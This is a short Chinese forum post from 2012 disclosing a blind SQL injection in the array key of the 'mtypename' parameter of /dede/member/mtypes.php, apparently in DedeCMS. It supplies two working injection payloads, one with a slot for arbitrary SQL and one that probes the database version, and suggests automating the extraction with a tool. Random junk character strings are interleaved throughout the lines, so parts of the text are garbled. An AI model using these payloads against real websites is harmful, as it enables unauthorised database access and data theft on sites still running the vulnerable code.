需要magic_quotes_gpc = Off,所以说是鸡肋啊.
+ a0 x) I9 S3 F" R. V
, J8 H8 A( u& ] q' i : M* h2 p0 }: c% b- e' k
发生在数组key里的注射漏洞,有点意思.
3 |; p( H* O5 u% ~7 I# P 7 r1 m5 |! t: S( q
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下! f; p1 X2 r, F: \$ s* U
$ D: \( x+ |0 x9 l
http://www.xxx.com /dede/member/mtypes.php?dopost=save! V( _$ M# c- f8 \7 Z
- W3 |! {; L' [# s; p, u- `0 e
exploit:/ d0 ^2 t) A, O) ^: d& t2 b1 `, r
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r4 G m8 _+ o* M! J& N$ b% v0 Q
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r0 T9 A/ ], ]0 S$ p+ N' p4 ]- Q/ [
|
发表于 2012-12-20 08:08:09
收藏
支持
反对